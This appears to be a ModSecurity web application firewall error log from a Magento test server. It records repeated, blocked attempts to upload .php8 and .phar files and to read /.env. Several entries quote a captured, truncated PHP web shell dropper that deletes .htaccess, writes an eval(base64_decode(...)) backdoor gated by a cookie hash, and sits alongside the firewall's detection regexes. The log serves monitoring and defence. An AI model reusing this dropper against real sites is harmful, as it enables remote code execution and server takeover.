"application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/z/dz88364f428d25.php8"] [unique_id "aV8sTRmwMJtANIcuNUXoSAAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Jan 08 05:02:21.226734 2026] [:error] [pid 1270038] [client 93.175.201.111:35816] [client 93.175.201.111] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/z/dz88364f428d25.php8"] [unique_id "aV8sTRmwMJtANIcuNUXoSAAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Jan 08 05:02:21.226918 2026] [:error] [pid 1270038] [client 93.175.201.111:35816] [client 93.175.201.111] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/z/dz88364f428d25.php8"] [unique_id "aV8sTRmwMJtANIcuNUXoSAAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Jan 08 20:15:09.189760 2026] [php:error] [pid 1280390] [client 4.196.89.30:14709] script '/var/www/magento.test.indacotrentino.com/www/pub/images/404.php' not found or unable to stat
[Fri Jan 09 01:51:48.972005 2026] [authz_core:error] [pid 1288539] [client 159.223.132.86:59806] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Fri Jan 09 01:51:51.972097 2026] [:error] [pid 1288582] [client 159.223.132.86:59836] [client 159.223.132.86] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWBRJwKimw7X4oWN8reL6gAAAAU"]
[Fri Jan 09 01:51:51.972323 2026] [:error] [pid 1288582] [client 159.223.132.86:59836] [client 159.223.132.86] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWBRJwKimw7X4oWN8reL6gAAAAU"]
[Fri Jan 09 01:51:51.972490 2026] [:error] [pid 1288582] [client 159.223.132.86:59836] [client 159.223.132.86] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWBRJwKimw7X4oWN8reL6gAAAAU"]
[Fri Jan 09 07:10:18.980058 2026] [:error] [pid 1291018] [client 194.110.207.198:46806] [client 194.110.207.198] ModSecurity: Rule 7f8312b7fbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/n/5n88364f428d25.phar"] [unique_id "aWCbyva-381C0T8V_x3Z2wAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Jan 09 07:10:18.980552 2026] [:error] [pid 1291018] [client 194.110.207.198:46806] [client 194.110.207.198] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/n/5n88364f428d25.phar"] [unique_id "aWCbyva-381C0T8V_x3Z2wAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Jan 09 07:10:18.982957 2026] [:error] [pid 1291018] [client 194.110.207.198:46806] [client 194.110.207.198] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/n/5n88364f428d25.phar"] [unique_id "aWCbyva-381C0T8V_x3Z2wAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Jan 09 07:10:18.983130 2026] [:error] [pid 1291018] [client 194.110.207.198:46806] [client 194.110.207.198] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/n/5n88364f428d25.phar"] [unique_id "aWCbyva-381C0T8V_x3Z2wAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Jan 09 07:10:19.612529 2026] [:error] [pid 1291018] [client 194.110.207.198:46806] [client 194.110.207.198] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: 5n88364f428d25.php8 found within FILES:custom_attributes[country_id]: 5n88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aWCby_a-381C0T8V_x3Z3AAAAAU"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/5/n/5n88364f428d25.phar
[Fri Jan 09 07:10:19.613131 2026] [:error] [pid 1291018] [client 194.110.207.198:46806] [client 194.110.207.198] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aWCby_a-381C0T8V_x3Z3AAAAAU"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/5/n/5n88364f428d25.phar
[Fri Jan 09 07:10:19.613307 2026] [:error] [pid 1291018] [client 194.110.207.198:46806] [client 194.110.207.198] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aWCby_a-381C0T8V_x3Z3AAAAAU"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/5/n/5n88364f428d25.phar
[Fri Jan 09 07:10:19.807308 2026] [:error] [pid 1291018] [client 194.110.207.198:46806] [client 194.110.207.198] ModSecurity: Rule 7f8312b7fbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/n/5n88364f428d25.php8"] [unique_id "aWCby_a-381C0T8V_x3Z3QAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Jan 09 07:10:19.807743 2026] [:error] [pid 1291018] [client 194.110.207.198:46806] [client 194.110.207.198] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/n/5n88364f428d25.php8"] [unique_id "aWCby_a-381C0T8V_x3Z3QAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Jan 09 07:10:19.809984 2026] [:error] [pid 1291018] [client 194.110.207.198:46806] [client 194.110.207.198] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/n/5n88364f428d25.php8"] [unique_id "aWCby_a-381C0T8V_x3Z3QAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Jan 09 07:10:19.810136 2026] [:error] [pid 1291018] [client 194.110.207.198:46806] [client 194.110.207.198] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/n/5n88364f428d25.php8"] [unique_id "aWCby_a-381C0T8V_x3Z3QAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Jan 10 08:57:12.796482 2026] [:error] [pid 1312461] [client 93.175.201.111:50534] [client 93.175.201.111] ModSecurity: Rule 7f971efc1be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/v/w/vw88364f428d25.phar"] [unique_id "aWIGWDKpkHRSb4uK8XHbpwAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Jan 10 08:57:12.796950 2026] [:error] [pid 1312461] [client 93.175.201.111:50534] [client 93.175.201.111] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/v/w/vw88364f428d25.phar"] [unique_id "aWIGWDKpkHRSb4uK8XHbpwAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Jan 10 08:57:12.799290 2026] [:error] [pid 1312461] [client 93.175.201.111:50534] [client 93.175.201.111] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/v/w/vw88364f428d25.phar"] [unique_id "aWIGWDKpkHRSb4uK8XHbpwAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Jan 10 08:57:12.799468 2026] [:error] [pid 1312461] [client 93.175.201.111:50534] [client 93.175.201.111] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/v/w/vw88364f428d25.phar"] [unique_id "aWIGWDKpkHRSb4uK8XHbpwAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Jan 10 08:57:16.022373 2026] [:error] [pid 1312461] [client 93.175.201.111:50534] [client 93.175.201.111] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: vw88364f428d25.php8 found within FILES:custom_attributes[country_id]: vw88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aWIGXDKpkHRSb4uK8XHbqAAAAAQ"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/v/w/vw88364f428d25.phar
[Sat Jan 10 08:57:16.023015 2026] [:error] [pid 1312461] [client 93.175.201.111:50534] [client 93.175.201.111] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aWIGXDKpkHRSb4uK8XHbqAAAAAQ"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/v/w/vw88364f428d25.phar
[Sat Jan 10 08:57:16.023427 2026] [:error] [pid 1312461] [client 93.175.201.111:50534] [client 93.175.201.111] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aWIGXDKpkHRSb4uK8XHbqAAAAAQ"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/v/w/vw88364f428d25.phar
[Sat Jan 10 08:57:16.398968 2026] [:error] [pid 1312461] [client 93.175.201.111:50534] [client 93.175.201.111] ModSecurity: Rule 7f971efc1be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/v/w/vw88364f428d25.php8"] [unique_id "aWIGXDKpkHRSb4uK8XHbqQAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Jan 10 08:57:16.399435 2026] [:error] [pid 1312461] [client 93.175.201.111:50534] [client 93.175.201.111] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/v/w/vw88364f428d25.php8"] [unique_id "aWIGXDKpkHRSb4uK8XHbqQAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Jan 10 08:57:16.401737 2026] [:error] [pid 1312461] [client 93.175.201.111:50534] [client 93.175.201.111] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/v/w/vw88364f428d25.php8"] [unique_id "aWIGXDKpkHRSb4uK8XHbqQAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Jan 10 08:57:16.401926 2026] [:error] [pid 1312461] [client 93.175.201.111:50534] [client 93.175.201.111] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/v/w/vw88364f428d25.php8"] [unique_id "aWIGXDKpkHRSb4uK8XHbqQAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Jan 11 10:34:19.602062 2026] [:error] [pid 1336306] [client 185.65.202.110:37932] [client 185.65.202.110] ModSecurity: Rule 7f30c5950be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/y/b/yb88364f428d25.phar"] [unique_id "aWNum-ullfRdfHpeOrl0YAAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Jan 11 10:34:19.602552 2026] [:error] [pid 1336306] [client 185.65.202.110:37932] [client 185.65.202.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/y/b/yb88364f428d25.phar"] [unique_id "aWNum-ullfRdfHpeOrl0YAAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Jan 11 10:34:19.605018 2026] [:error] [pid 1336306] [client 185.65.202.110:37932] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/y/b/yb88364f428d25.phar"] [unique_id "aWNum-ullfRdfHpeOrl0YAAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Jan 11 10:34:19.605196 2026] [:error] [pid 1336306] [client 185.65.202.110:37932] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/y/b/yb88364f428d25.phar"] [unique_id "aWNum-ullfRdfHpeOrl0YAAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Jan 11 10:34:19.851553 2026] [:error] [pid 1336306] [client 185.65.202.110:37932] [client 185.65.202.110] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: yb88364f428d25.php8 found within FILES:custom_attributes[country_id]: yb88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aWNum-ullfRdfHpeOrl0YQAAAAU"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/y/b/yb88364f428d25.phar
